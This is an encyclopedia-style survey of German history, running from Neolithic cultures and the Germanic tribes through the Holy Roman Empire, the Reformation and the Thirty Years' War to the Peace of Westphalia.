Central Germany was one of the primary areas of theLinear Pottery culture(c.5500 BC– c.4500 BC), which was partially contemporary with theErtebølle culture(c.5300 BC– c.3950 BC) of Denmark and northern Germany. The construction of the Central EuropeanNeolithic circular enclosuresfalls in this time period with the best known and oldest being theGoseck circle, constructedc.4900 BC. Afterwards, Germany was part of theRössen culture,Michelsberg cultureandFunnelbeaker culture(c.4600 BC– c.2800 BC). The oldest traces for the use of wheel and wagon ever found are located at a northern German Funnelbeaker culture site and date to around 3400 BC.[14]
The settlers of theCorded Ware culture(c.2900 BC– c.2350 BC), that had spread all over the fertile plains of Central Europe during the Late Neolithic were ofIndo-Europeanancestry. The Indo-Europeans had, via mass-migration, arrived into the heartland of Europe around 4,500 years ago.[16]
By the lateBronze Age, theUrnfield culture(c.1300 BC– c.750 BC) had replaced theBell Beaker,UneticeandTumulus culturesin central Europe,[17]whilst theNordic Bronze Agehad developed in Scandinavia and northern Germany. The name comes from the custom ofcrematingthe dead and placing their ashes inurns, which were then buried in fields. The first usage of the name occurred in publications over grave sites in southern Germany in the late 19th century.[18][19]Over much of Europe, the Urnfield culture followed theTumulus cultureand was succeeded by theHallstatt culture.[20]TheItalic peoples, including theLatins, from which theRomansemerged, come from the Urnfield culture of central Europe.[21][22][23]
TheHallstatt culture, which had developed from the Urnfield culture, was the predominant Western and Central European culture from the 12th to 8th centuries BC and during the earlyIron Age(8th to 6th centuries BC). It was followed by theLa Tène culture(5th to 1st centuries BC).
The people who had adopted these cultural characteristics in central and southern Germany are regarded asCelts. How and if the Celts are related to the Urnfield culture remains disputed. However, Celtic cultural centres developed in central Europe during the late Bronze Age (c.1200 BCuntil 700 BC). Some, like theHeuneburg, the oldest city north of the Alps,[24]grew to become important cultural centres of the Iron Age in Central Europe, that maintained trade routes to theMediterranean. In the 5th century BC the Greek historianHerodotusmentioned a Celtic city at the Danube –Pyrene, that historians attribute to the Heuneburg. Beginning around 700 BC (or later),Germanic peoples(Germanic tribes) fromsouthern Scandinavia and northern Germanyexpanded south and gradually replaced the Celtic peoples in Central Europe.[25][26][27][28][29][30]
Theethnogenesisof theGermanic tribesremains debated. However, for authorAveril Cameron"it is obvious that a steady process" occurred during theNordic Bronze Age, or at the latest during thePre-Roman Iron Age[33](Jastorf culture). From their homes in southern Scandinavia and northern Germany the tribes began expanding south, east and west during the 1st century BC,[34]and came into contact with theCeltictribes ofGaul, as well as withIranic,[35]Baltic,[36]andSlaviccultures inCentral/Eastern Europe.[37]
Factual and detailed knowledge about the early history of the Germanic tribes is rare. Researchers have to be content with the recordings of the tribes' affairs with theRomans, linguistic conclusions, archaeological discoveries and the rather new yet auspicious results ofarchaeogeneticstudy.[38]In the mid-1st century BC,Republican RomanstatesmanJulius Caesarerected thefirst known bridges across the Rhineduring hiscampaign in Gauland led a military contingent across and into the territories of the local Germanic tribes. After several days and having made no contact with Germanic troops (who had retreated inland) Caesar returned to the west of the river.[39]By 60 BC, theSuebitribe under chieftainAriovistus, had conquered lands of the GallicAeduitribe to the west of the Rhine. Consequent plans to populate the region with Germanic settlers from the east were vehemently opposed by Caesar, who had already launched hisambitious campaignto subjugate all Gaul. Julius Caesar defeated the Suebi forces in 58 BC in theBattle of Vosgesand forced Ariovistus to retreat across the Rhine.[40][41]
Augustus, firstRoman emperor, considered conquest beyond theRhineand theDanubenot only regular foreign policy but also necessary to counter Germanic incursions into a still rebellious Gaul. Forts and commercial centers were established along the rivers. Some tribes, such as theUbiiconsequently allied with Rome and readily adopted advanced Roman culture. During the 1st century CE Roman legions conducted extended campaigns intoGermania magna, the area north of the Upper Danube and east of the Rhine, attempting to subdue the various tribes. Roman ideas of administration, the imposition of taxes and a legal framework were frustrated by the total absence of an infrastructure.Germanicus'scampaigns, for example, were almost exclusively characterized by frequent massacres of villagers and indiscriminate pillaging. The tribes, however maintained their elusive identities. A coalition of tribes under theCheruscichieftainArminius, who was familiar with Roman tactical doctrines, defeated a large Roman force in theBattle of the Teutoburg Forest. Consequently, Rome resolved to permanently establish the Rhine/Danube border and refrain from further territorial advance into Germania.[42][43]By AD 100 the frontier along the Rhine and the Danube and theLimes Germanicuswas firmly established. Several Germanic tribes lived under Roman rule south and west of the border, as described inTacitus'sGermania. Austria formed the regular provinces ofNoricumandRaetia.[44][45][46]The provincesGermania Inferior(with the capital situated atColonia Claudia Ara Agrippinensium, modernCologne) andGermania Superior(with its capital atMogontiacum, modernMainz), were formally established in 85 AD, after long campaigns as lasting military control was confined to the lands surrounding the rivers.[47]Christianity was introducedto Roman controlled western Germania before the Middle Ages, with Christian religious structures such as theAula PalatinaofTrierbuilt during the reign ofConstantine I(r.306–337).[48]
Rome'sThird Century Crisiscoincided with the emergence of a number of large West Germanic tribes: theAlamanni,Franks,Bavarii,Chatti,Saxons,Frisii,Sicambri, andThuringii. By the 3rd century the Germanic speaking peoples began to migrate beyond thelimesand the Danube frontier.[49]Several large tribes – theVisigoths,Ostrogoths,Vandals,Burgundians,Lombards,SaxonsandFranks– migrated and played their part in thedecline of the Roman Empireand the transformation of the oldWestern Roman Empire.[50]By the end of the 4th century theHunsinvaded eastern and central Europe, establishing theHunnic Empire. The event triggered theMigration Period.[51]Hunnic hegemony over a vast territory in central and eastern Europe lasted until the death ofAttila's sonDengizichin 469.[52]Another pivotal moment in the Migration Period was theCrossing of the Rhinein December of 406 by a large group of tribes includingVandals,AlansandSuebiwho settled permanently within the crumbling Western Roman Empire.[53]
Stem duchies(German:Stammesherzogtümer) in Germany refer to the traditional territory of the various Germanic tribes. The concept of such duchies survived especially in the areas which by the 9th century would constituteEast Francia,[54]which included theDuchy of Bavaria, theDuchy of Swabia, theDuchy of Saxony, theDuchy of Franconiaand theDuchy of Thuringia,[55]unlike further west theCounty of BurgundyorLorraineinMiddle Francia.[56][57]
TheSalian emperors(reigned 1027–1125) retained the stem duchies as the major divisions of Germany, but they became increasingly obsolete during the early high-medieval period under theHohenstaufen, andFrederick Barbarossafinally abolished them in 1180 in favour of more numerous territorial duchies.
Successive kings of Germany founded a series of border counties ormarchesin the east and the north. These includedLusatia, theNorth March(which would becomeBrandenburgand the heart of the futurePrussia), and theBillung March. In the south, the marches includedCarniola,Styria, and theMarch of Austriathat would becomeAustria.
The Western Roman Empire fell in 476 with thedeposition of Romulus Augustusby the GermanicfoederatileaderOdoacer, who became the firstKing of Italy.[58]Afterwards, the Franks, like other post-Roman Western Europeans, emerged as a tribal confederacy in the Middle Rhine-Weser region, among the territory soon to be calledAustrasia(the "eastern land"), the northeastern portion of the future Kingdom of theMerovingianFranks. As a whole, Austrasia comprised parts of present-dayFrance,Germany,Belgium,Luxembourgand theNetherlands. Unlike theAlamannito their south inSwabia, they absorbed large swaths of former Roman territory as they spread west intoGaul, beginning in 250.Clovis Iof theMerovingian dynastyconquered northern Gaul in 486 and in theBattle of Tolbiacin 496 theAlemannitribe inSwabia, which eventually became theDuchy of Swabia.
By 500, Clovis had united all the Frankish tribes, ruled all of Gaul[59]and was proclaimedKing of the Franksbetween 509 and 511.[60]Clovis, unlike most Germanic rulers of the time, was baptized directly intoRoman Catholicisminstead ofArianism. His successors would cooperate closely withpapalmissionaries, among themSaint Boniface. After the death of Clovis in 511, his four sons partitioned his kingdom includingAustrasia. Authority over Austrasia passed back and forth from autonomy to royal subjugation, as successiveMerovingiankings alternately united and subdivided the Frankish lands.[61]
During the 5th and 6th centuries the Merovingian kings conquered theThuringii(531 to 532), theKingdom of the Burgundiansand the principality of Metz and defeated the Danes, the Saxons and the Visigoths.[62]KingChlothar I(558 to 561) ruled the greater part of what is now Germany and undertook military expeditions intoSaxony, while the South-east of what is modern Germany remained under the influence of theOstrogoths. Saxons controlled the area from the northern sea board to theHarz Mountainsand theEichsfeldin the south.[63]
The Merovingians placed the various regions of their Frankish Empire under the control of semi-autonomous dukes – either Franks or local rulers,[64]and followedimperial Romanstrategic traditions of social and political integration of the newly conquered territories.[65][66]While allowed to preserve their own legal systems,[67]the conquered Germanic tribes were pressured to abandon theArianChristian faith.[68]
In 718Charles Martelwaged war against the Saxons in support of theNeustrians. In 743 his sonCarlomanin his role asMayor of the Palacerenewed the war against the Saxons, who had allied with and aided the dukeOdilo of Bavaria.[69]The Catholic Franks, who by 750 controlled avast territoryin Gaul, north-western Germany, Swabia,Burgundyand westernSwitzerland, that included thealpinepasses allied with the Curia inRomeagainst theLombards, who posed a permanent threat to the Holy See.[59]Pressed byLiutprand, King of the Lombards, a Papal envoy for help had already been sent to the de facto rulerCharles Martelafter his victory in 732 over the forces of the Umayyad Caliphate at theBattle of Tours, however a lasting and mutually beneficial alliance would only materialize after Charles' death under his successor Duke of the Franks, Pepin the Short.[70]
In 751Pippin III,Mayor of the Palaceunder the Merovingian king, himself assumed the title of king and was anointed by the Church.Pope Stephen IIbestowed him the hereditary title ofPatricius Romanorumas protector of Rome and St. Peter[71]in response to theDonation of Pepin, that guaranteed the sovereignty of thePapal States.Charles the Great(who ruled the Franks from 774 to 814) launched a decades-long military campaign against the Franks' heathen rivals, theSaxonsand theAvars. The campaigns and insurrections of theSaxon Warslasted from 772 to 804. The Franks eventually overwhelmed the Saxons and Avars, forcibly converted the people toChristianity, and annexed their lands to theCarolingian Empire.
After the death of Frankish kingPepin the Shortin 768, his oldest son "Charlemagne" ("Charles the Great") consolidated his power over and expanded theKingdom. Charlemagne ended 200 years of Royal Lombard rule with theSiege of Pavia, and in 774 he installed himself asKing of the Lombards. Loyal Frankish nobles replaced the old Lombard aristocracy following a rebellion in 776.[72]The next 30 years of his reign were spent ruthlessly strengthening his power in Francia and on the conquest of the Slavs andPannonian Avarsin the east and alltribes, such as theSaxonsand theBavarians.[73][74]OnChristmas Day, 800 AD, Charlemagne was crownedImperator Romanorum(Emperor of the Romans) in Rome byPope Leo III.[74]
Fighting among Charlemagne's three grandsons over the continuation of the custom ofpartible inheritanceor the introduction ofprimogeniturecaused the Carolingian empire to be partitioned into three parts by theTreaty of Verdunof 843.[75]Louis the Germanreceived the Eastern portion of the kingdom,East Francia, all lands east of the Rhine river and to the north of Italy. This encompassed the territories of the Germanstem duchies– Franks, Saxons,Swabians, and Bavarians – that were united in a federation under the first non-Frankish kingHenry the Fowler, who ruled from 919 to 936.[76]The royal court permanently moved in between a series of strongholds, calledKaiserpfalzen, that developed into economic and cultural centers.Aachen Palaceplayed a central role, as the localPalatine Chapelserved as the official site for all royal coronation ceremonies during the entire medieval period until 1531.[74][77]
In 936,Otto Iwas crowned German king atAachen, in 961King of ItalyinPaviaand crowned emperor byPope John XIIinRomein 962. The tradition of the German King as protector of the Kingdom of Italy and the Latin Church resulted in the termHoly Roman Empirein the 12th century. The name, that was to identify with Germany continued to be used officially, with the extension added:Nationis Germanicæ (of the German nation)after the last imperial coronation in Rome in 1452 until its dissolution in 1806.[76]Otto strengthened the royal authority by re-asserting the oldCarolingianrights over ecclesiastical appointments.[78]Otto wrested from the nobles the powers of appointment of the bishops and abbots, who controlled large land holdings. Additionally, Otto revived the old Carolingian program of appointing missionaries in the border lands. Otto continued to supportcelibacyfor the higher clergy, so ecclesiastical appointments never became hereditary. By granting lands to the abbots and bishops he appointed, Otto actually turned these bishops into "princes of the Empire" (Reichsfürsten).[79]In this way, Otto was able to establish a national church. Outside threats to the kingdom were contained with the decisive defeat of the HungarianMagyarsat theBattle of Lechfeldin 955. TheSlavsbetween theElbeand theOderrivers were also subjugated. Otto marched on Rome and droveJohn XIIfrom the papal throne and for years controlled the election of the pope, setting a firm precedent for imperial control of the papacy for years to come.[80][81]
Otto I was followed on the throne by his sonOtto II(955–983), emperor 973–983, Otto II's wifeTheophanu(955–991), regent 983–991, his own wifeAdelaide of Italy(931–999), regent 991–995, and his grandsonOtto III(980–1002), emperor 996–1002. Otto III died childless and was succeeded by his second cousinHenry II, who likewise died childless as the last emperor of the Ottonian dynasty.
Henry II was succeeded byConrad II, a great-great-grandson of Otto I and the first emperor of theSalian dynasty. During the reign of Conrad II's son,Henry III(1039 to 1056), the empire supported theCluniac reformsof the Church, thePeace of God, prohibition ofsimony(the purchase of clerical offices), and requiredcelibacyof priests. Imperial authority over the Pope reached its peak. However, Rome reacted with the creation of theCollege of CardinalsandPope Gregory VII'sseries of clerical reforms. Pope Gregory insisted in hisDictatus Papaeon absolute papal authority over appointments to ecclesiastical offices. The subsequent conflict in which emperorHenry IVwas compelled to submit to the Pope atCanossain 1077, after having been excommunicated came to be known as theInvestiture Controversy. In 1122, a temporary reconciliation was reached betweenHenry Vand the Pope with theConcordat of Worms. With the conclusion of the dispute the Roman church and the papacy regained supreme control over all religious affairs.[83][84]Consequently, the imperial Ottonian church system (Reichskirche) declined. It also ended the royal/imperial tradition of appointing selected powerful clerical leaders to counter the Imperial secular princes.[85]
Between 1095 and 1291 the various campaigns of thecrusadesto the Holy Land took place. Knightly religious orders were established, including theKnights Templar, the Knights of St John (Knights Hospitaller), and theTeutonic Order.[86][87]
The termsacrum imperium(Holy Empire) was first used officially byFriedrich Iin 1157,[88]but the wordsSacrum Romanum Imperium, Holy Roman Empire, were only combined in July 1180 and would never consistently appear on official documents from 1254 onwards.[89]
TheHanseatic Leaguewas a commercial and defensive alliance of the merchantguildsof towns and cities in northern and central Europe that dominated marine trade in theBaltic Sea, theNorth Seaand along the connected navigable rivers during the Late Middle Ages ( 12th to 15th centuries ). Each of the affiliated cities retained the legal system of its sovereign and, with the exception of theFree imperial cities, had only a limited degree of political autonomy.[90]Beginning with an agreement of the cities ofLübeckandHamburg, guilds cooperated in order to strengthen and combine their economic assets, like securing trading routes and tax privileges, to control prices and better protect and market their local commodities. Important centers of commerce within the empire, such asCologneon theRhineriver andBremenon theNorth Seajoined the union, which resulted in greater diplomatic esteem.[91]Recognized by the various regional princes for the great economic potential, favorable charters for, often exclusive, commercial operations were granted.[92]During its zenith the alliance maintained trading posts andkontorsin virtually all cities betweenLondonandEdinburghin the west toNovgorodin the east andBergenin Norway. By the late 14th century the powerful league enforced its interests with military means, if necessary. This culminated ina warwith the sovereign Kingdom of Denmark from 1361 to 1370. Principal city of the Hanseatic League remained Lübeck, where in 1356 the first general diet was held and its official structure was announced. The league declined after 1450 due to a number of factors, such as the15th-century crisis, the territorial lords' shifting policies towards greater commercial control, thesilver crisisand marginalization in the wider Eurasian trade network, among others.[93][94]
TheOstsiedlung(lit. Eastern settlement) is the term for a process of largely uncoordinated immigration and chartering of settlement structures by ethnic Germans into territories, already inhabited bySlavsandBaltseast of theSaaleandElberivers, such as modern Poland andSilesiaand to the south intoBohemia, modern Hungary and Romania during theHigh Middle Agesfrom the 11th to the 14th century.[95][96]The primary purpose of the early imperial military campaigns into the lands to the east during the 10th and 11th century, was to punish and subjugate the localheathentribes. Conquered territories were mostly lost after the troops had retreated, but eventually were incorporated into the empire asmarches, fortified borderlands with garrisoned troops in strongholds and castles, who were to ensure military control and enforce the exaction of tributes. Contemporary sources do not support the idea of policies or plans for the organized settlement of civilians.[97]
Emperor Lothair IIre-established feudal sovereignty over Poland, Denmark and Bohemia from 1135 and appointedmargravesto turn the borderlands into hereditaryfiefsand install a civilian administration. There is no discernible chronology of the immigration process as it took place in many individual efforts and stages, often even encouraged by the Slavic regional lords. However, the new communities were subjected to German law and customs. Total numbers of settlers were generally rather low and, depending on who held a numerical majority, populations usually assimilated into each other. In many regions only enclaves would persist, likeHermannstadt, founded by theTransylvanian Saxonsin the medieval Hungarian Kingdom (today in Romania) who were called on byGeza IIto repopulate the area as part of theOstsiedlung, having arrived there and founding the city in 1147 [Saxons called these parts of Transylvania "Altland" to distinguish them from later immigrant Saxon settlements established in about 1220 by the Teutonic Order].[98][99]
In 1230, the Catholicmonasticorder of theTeutonic Knightslaunched thePrussian Crusade. The campaign, that was supported by the forces of Polish dukeKonrad I of Masovia, initially intended to Christianize the BalticOld Prussians, succeeded primarily in the conquest of large territories. The order, emboldened byimperial approval, quickly resolved to establish an independentstate, without the consent of duke Konrad. Recognizing only papal authority and based on a solid economy, the order steadily expanded the Teutonic state during the following 150 years, engaging in several land disputes with its neighbors. Permanent conflicts with theKingdom of Poland, theGrand Duchy of Lithuania, and theNovgorod Republic, eventually led tomilitary defeatand containment by the mid-15th century. The lastGrand MasterAlbert of Brandenburgconverted toLutheranismin 1525 and turned the remaining lands of the order into the secularDuchy of Prussia.[100][101]
Henry V, great-grandson of Conrad II, who had overthrown his fatherHenry IVbecameHoly Roman Emperorin 1111. Hoping to gain greater control over the church inside the Empire, Henry V appointedAdalbert of Saarbrückenas the powerfularchbishop of Mainzin the same year. Adalbert began to assert the powers of the Church against secular authorities, that is, the Emperor. This precipitated the "Crisis of 1111" as yet another chapter of the long-termInvestiture Controversy.[102]In 1137, the prince-electors turned back to theHohenstaufenfamily for a candidate,Conrad III. Conrad tried to divest his rivalHenry the Proudof his two duchies—BavariaandSaxony—that led to war in southern Germany as the empire was divided into two powerful factions. The faction of theWelfsorGuelphs(in Italian) supported theHouse of Welfof Henry the Proud, which was the ruling dynasty in the Duchy of Bavaria. The rival faction of theWaiblingsorGhibellines(in Italian) pledged allegiance to theSwabianHouse of Hohenstaufen. During this early period, the Welfs generally maintained ecclesiastical independence under the papacy andpolitical particularism(the focus on ducal interests against the central imperial authority). The Waiblings, on the other hand, championed strict control of the church and a strong central imperial government.[103]
During the reign of theHohenstaufenemperorFrederick I(Barbarossa), an accommodation was reached in 1156 between the two factions. The Duchy of Bavaria was returned to Henry the Proud's sonHenry the Lion, duke ofSaxony, who represented theGuelphparty. However, theMargraviate of Austriawas separated from Bavaria and turned into the independentDuchy of Austriaby virtue of thePrivilegium Minusin 1156.[104]
Having become wealthy through trade, the confident cities of Northern Italy, supported by the Pope, increasingly opposed Barbarossa's claim of feudal rule(Honor Imperii)over Italy. The cities united in theLombard Leagueand finally defeated Barbarossa in theBattle of Legnanoin 1176. The following year a reconciliation was reached between the emperor andPope Alexander IIIin theTreaty of Venice.[105]The 1183Peace of Constanceeventually settled that the Italian cities remained loyal to the empire but were granted local jurisdiction and fullregal rightsin their territories.[106]
In 1180, Henry the Lion was outlawed, Saxony was divided, and Bavaria was given toOtto of Wittelsbach, who founded theWittelsbach dynasty, which was to rule Bavaria until 1918.
From 1184 to 1186, the empire underFrederick I Barbarossareached its cultural peak with theDiet of Pentecostheld atMainzand the marriage of his sonHenryin Milan to theNormanprincessConstance of Sicily.[107]The power of the feudal lords was undermined by the appointment ofministerials(unfree servants of the Emperor) as officials. Chivalry and the court life flowered, as expressed in the scholastic philosophy ofAlbertus Magnusand the literature ofWolfram von Eschenbach.[108]
Between 1212 and 1250,Frederick IIestablished a modern, professionally administered state from his base inSicily. He resumed the conquest of Italy, leading to further conflict with thePapacy. In the Empire, extensive sovereign powers were granted to ecclesiastical and secular princes, leading to the rise of independent territorial states. The struggle with the Pope sapped the Empire's strength, as Frederick II was excommunicated three times. After his death, the Hohenstaufen dynasty fell, followed by aninterregnumduring which there was no Emperor (1250–1273). This interregnum came to an end with the election of a small Swabian count, Rudolf of Habsburg, as emperor.[109][110]
The failure of negotiations between EmperorLouis IVand the papacy led to the 1338Declaration at Rhenseby six princes of theImperial Estateto the effect that election by all or the majority of the electors automatically conferred the royal title and rule over the empire, without papal confirmation. As result, the monarch was no longer subject to papal approbation and became increasingly dependent on the favour of the electors. Between 1346 and 1378Emperor Charles IVofLuxembourg, king of Bohemia, sought to restore imperial authority. The 1356 decree of theGolden Bullstipulated that all future emperors were to be chosen by a college of onlyseven– four secular and three clerical – electors. The secular electors were the King of Bohemia, theCount Palatineof the Rhine, the Duke ofSaxony, and the Margrave ofBrandenburg, the clerical electors were the Archbishops ofMainz,Trier, andCologne.[111]
Between 1347 and 1351 Germany and almost the entire European continent were consumed by the most severe outbreak of theBlack Deathpandemic. Estimated to have caused the abrupt death of 30 to 60% of Europe's population, it led to widespread social and economic disruption and deep religious disaffection and fanaticism. Minority groups, and Jews in particular were blamed, singled out andattacked. As a consequence, many Jews fled and resettled in Eastern Europe.[112][113]
Total population estimates of the German territories range around 5 to 6 million by the end of Henry III's reign in 1056 and about 7 to 8 million after Friedrich Barbarossa's rule in 1190.[114][115]The vast majority were farmers, typically in a state ofserfdomunder feudal lords and monasteries.[103]Towns gradually emerged and in the 12th century many new cities were founded along the trading routes and near imperial strongholds and castles. The towns were subjected to themunicipal legal system. Cities such asCologne, that had acquired the status ofImperial Free Cities, were no longer answerable to the local landlords or bishops, but immediate subjects of the Emperor and enjoyed greater commercial and legal liberties.[116]The towns were ruled by a council of the – usuallymercantile– elite, thepatricians.Craftsmenformedguilds, governed by strict rules, which sought to obtain control of the towns; a few were open to women. Society had diversified, but was divided into sharply demarcated classes of theclergy,physicians,merchants, various guilds of artisans, unskilled day labourers andpeasants. Full citizenship was not available topaupers. Political tensions arose from issues of taxation, public spending, regulation of business, and market supervision, as well as the limits of corporate autonomy.[117]
Cologne'scentral location on theRhineriver placed it at the intersection of the major trade routes between east and west and was the basis of Cologne's growth.[118]The economic structures of medieval and early modern Cologne were characterized by the city's status as a major harbor and transport hub upon the Rhine. It was the seat of an archbishop, under whose patronage the vastCologne Cathedralwas built since 1240. The cathedral houses sacred Christian relics and it has since become a well knownpilgrimage destination. By 1288 the city had secured its independence from the archbishop (who relocated to Bonn), and was ruled by itsburghers.[119]
BenedictineabbessHildegard von Bingenwrote several influential theological, botanical, and medicinal texts, as well as letters, liturgical songs, poems, and arguably the oldest survivingmorality play,Ordo Virtutum, while supervising brilliant miniatureIlluminations. About 100 years later,Walther von der Vogelweidebecame the most celebrated of theMinnesänger, who wereMiddle High Germanlyric poets.
Around 1439,Johannes GutenbergofMainz, usedmovable typeprinting and issued theGutenberg Bible. He was the global inventor of theprinting press, thereby starting thePrinting Revolution. Cheap printed books and pamphlets played central roles for the spread of theReformationand theScientific Revolution.
Around the transition from the 15th to the 16th century,Albrecht DürerfromNurembergestablished his reputation across Europe aspainter,printmaker,mathematician,engraver, andtheoristwhen he was still in his twenties and secured his reputation as one of the most important figures of theNorthern Renaissance.
The early-modern European society gradually developed after the disasters of the 14th century as religious obedience and political loyalties declined in the wake of theGreat Plague, theschismof the Church and prolonged dynastic wars. The rise of thecitiesand the emergence of the newburgherclass eroded the societal, legal and economic order of feudalism.[127]
The commercial enterprises of the mercantile elites in the quickly developing cities in South Germany (such asAugsburgandNuremberg), with the most prominent families being theGossembrots,Fuggers(the wealthiest family in Europe during the fifteenth and sixteenth centuries[130]),Welsers,Hochstetters, Imholts, generated unprecedented financial means. As financiers to both the leading ecclesiastical and secular rulers, these families fundamentally influenced the political affairs in the empire during the fifteenth and sixteenth century.[131][132][133][134]The increasingly money based economy also provoked social discontent among knights and peasants and predatory "robber knights" became common.[135]
From 1438 theHabsburgdynasty, who had acquired control in the south-eastern empire over the Duchy of Austria,BohemiaandHungaryafter the death of KingLouis IIin 1526, managed to permanently occupy the position of the Holy Roman Emperor until 1806 (with the exception of the years between 1742 and 1745).
Some Europe-wide revolutions were born in the Empire: the combination of thefirst modern postal systemestablished byMaximilian(with the management under theTaxis family) with the printing system invented by Gutenberg produced a communication revolution[136][137][138]– the Empire's decentralized nature made censorship difficult and this combined with the new communication system to facilitate free expression, thus elevating cultural life. The system also helped the authorities to disseminate orders and policies, boosted the Empire's coherence in general, and helped reformers like Luther to broadcast their views and communicate with each other effectively, thus contributing to the religious Reformation.[139][140][141]
Maximilian'smilitary reforms, especially his development of theLandsknechte, caused a military revolution that broke the back of the knight class[142][143]and spread all over Europe shortly after his death.[144][145]
During his reign from 1493 to 1519,Maximilian I, in a combined effort with the Estates (who sometimes acted as opponents and sometimes as cooperators to him), his officials and his humanists,reformedthe empire. A dual system of Supreme Courts (theReichskammergerichtand theReichshofrat) was established (with theReichshofratplaying a more efficient role during the Early Modern period),[150]together with the formalized Reception of Roman Law;[151][152][153][154]theImperial Diet(Reichstag) became the all-important political forum and the supreme legal and constitutional institution, which would act as a guarantee for the preservation of the Empire in the long run;[155][156]a Permanent Land Piece (Ewiger Landfriede) was declared in 1495 with regional leagues and unions providing the supporting structure, together with the creation of theReichskreise(Imperial Circles, which would serve the purpose of organize imperial armies, collect taxes and enforce orders of the imperial institutions);[157][158][159]the Imperial and Court Chanceries were combined to become the decisive government institution;[160][161]theLandsknechtethat Maximilian created became a form of imperial army;[162]a national political culture began to emerge;[163][164]and the German language began to attain an unified form.[165][166]The political structure remained incomplete and piecemeal though, mainly due to the failure of the Common Penny (an imperial tax) that the Estates resisted.[150][a]Through many compromises between emperor and estates though, a flexible, future-oriented problem-solving mechanism for the Empire was formed, together with a monarchy through which the emperor shared power with the Estates.[168][b]Whether the Reform also equated to a (successful or unsuccessful) nation building process remains a debate.[170]
The additionNationis Germanicæ(of German Nation) to the emperor's title appeared first in the 15th century: in a 1486 law decreed by Frederick III and in 1512 in reference to the Imperial Diet in Cologne by Maximilian I. In 1525, the Heilbronn reform plan – the most advanced document of theGerman Peasants' War(Deutscher Bauernkrieg) – referred to theReichasvon Teutscher Nation(of German nation). During the fifteen century, the term "German nation" had witness a rise in use due to the growth of a "community of interests". The Estates also increasingly distinguished between their German Reich and the wider, "universal" Reich.[171]
In order to manage their ever growing expenses, theRenaissance Popesof the 15th and early 16th century promoted the excessive sale ofindulgencesand offices and titles of the Roman Curia.
In 1517, the monkMartin Lutherpublished a pamphlet with95 Thesesthat he posted in the town square ofWittenbergand handed copies of to feudal lords. Whether he nailed them to a church door at Wittenberg remains unclear. The list detailed 95 assertions, he argued, represented corrupt practice of the Christian faith and misconduct within the Catholic Church. Although perhaps not Luther's chief concern, he received popular support for his condemnation of the sale ofindulgencesand clerical offices, the pope's and higher clergy's abuse of power and his doubts of the very idea of the institution of the Church and the papacy.[172]
The ProtestantReformationwas the first successful challenge to the Catholic Church and began in 1521 as Luther was outlawed at theDiet of Wormsafter his refusal to repent. The ideas of the reformation spread rapidly, as the new technology of the modern printing press ensured cheap mass copies and distribution of the theses and helped by theEmperor Charles V's wars with France and theTurks.[172]Hiding in theWartburg Castle, Luther translated the Bible into German, thereby greatly contributing to the establishment of the modern German language. This is highlighted by the fact that Luther spoke only a local dialect of minor importance during that time. After the publication of his Bible, his dialect suppressed others and constitutes to a great extent what is now modern German. With theprotestationof the Lutheran princes at theImperial DietofSpeyerin 1529 and the acceptance and adoption of the LutheranAugsburg Confessionby the Lutheran princes beginning in 1530, the separate Lutheran church was established.[173]
TheGerman Peasants' War, which began in the southwest inAlsaceandSwabiaand spread further east intoFranconia,Thuringiaand Austria, was a series of economic and religious revolts of the rural lower classes, encouraged by the rhetoric of various radical religious reformers and Anabaptists against the ruling feudal lords. Although occasionally assisted by war-experienced noblemen likeGötz von BerlichingenandFlorian Geyer(in Franconia) and the theologianThomas Müntzer(in Thuringia), the peasant forces lacked military structure, skill, logistics and equipment and as many as 100,000 insurgents were eventually defeated and massacred by the territorial princes.[174]
The CatholicCounter-Reformation, initiated in 1545 at theCouncil of Trentwas spearheaded by the scholarly religiousJesuit order, that was founded just five years prior by several clerics aroundIgnatius of Loyola. Its intent was to challenge and contain the Protestant Reformation via apologetic and polemical writings and decrees, ecclesiastical reconfiguration, wars and imperial political maneuverings. In 1547, emperor Charles V defeated theSchmalkaldic League, a military alliance of Protestant rulers.[175]The 1555Peace of Augsburgdecreed the recognition of the Lutheran Faith and religious division of the empire. It also stipulated the ruler's right to determine the official confession in his principality (Cuius regio, eius religio). The Counter-Reformation eventually failed to reintegrate the central and northern German Lutheran states. In 1608/1609 theProtestant Unionand theCatholic Leaguewere formed.
The 1618 to 1648Thirty Years' War, that took place almost exclusively in the Holy Roman Empire has its origins, which remain widely debated, in the unsolved and recurring conflicts of the Catholic and Protestant factions. The Catholic emperorFerdinand IIattempted to achieve the religious and political unity of the empire, while the opposing Protestant Union forces were determined to defend their religious rights. The religious motive served as the universal justification for the various territorial and foreign princes, who over the course of several stages joined either of the two warring parties in order to gain land and power.[176][177]
The conflict was sparked by therevolt of the Protestant nobility of Bohemiaagainst emperorMatthias' succession policies. After imperial triumph at theBattle of White Mountainand a short-lived peace, the war grew to become a political European conflict by the intervention ofKing Christian IV of Denmarkfrom 1625 to 1630,Gustavus Adolphus of Swedenfrom 1630 to 1648 and France underCardinal Richelieufrom 1635 to 1648. The conflict increasingly evolved into a struggle between the French House of Bourbon and the House of Habsburg for predominance in Europe, for which the central German territories of the empire served as the battleground.[178]
The war ranks among the most catastrophic in history as three decades of constant warfare and destruction had left the land devastated. Marauding armies incessantly pillaged the countryside, seized and levied heavy taxes on cities and indiscriminately plundered the food stocks of the peasantry. There were also the countless bands of murderous outlaws, sick, homeless, disrupted people and invalid soldiery. Overall social and economic disruption caused a dramatic decline in population as a result of pandemic murder and random rape and killings, endemic infectious diseases, crop failures, famine, declining birth rates, wanton burglary, witch-hunts and the emigration of terrified people. Estimates vary between a 38% drop from 16 million people in 1618 to 10 million by 1650 and a mere 20% drop from 20 million to 16 million. TheAltmarkandWürttembergregions were especially hard hit, where it took generations to fully recover.[176][179]
The war was the last major religious struggle in mainland Europe and ended in 1648 with thePeace of Westphalia. It resulted in increased autonomy for the constituent states of the Holy Roman Empire, limiting the power of the emperor. Most ofAlsacewas ceded to France,Western PomeraniaandBremen-Verdenwere given to Sweden as Imperial fiefs, and the Netherlands officially left the Empire.[180]
The population of Germany reached about twenty million people by the mid-16th century, the great majority of whom were peasant farmers.[182]
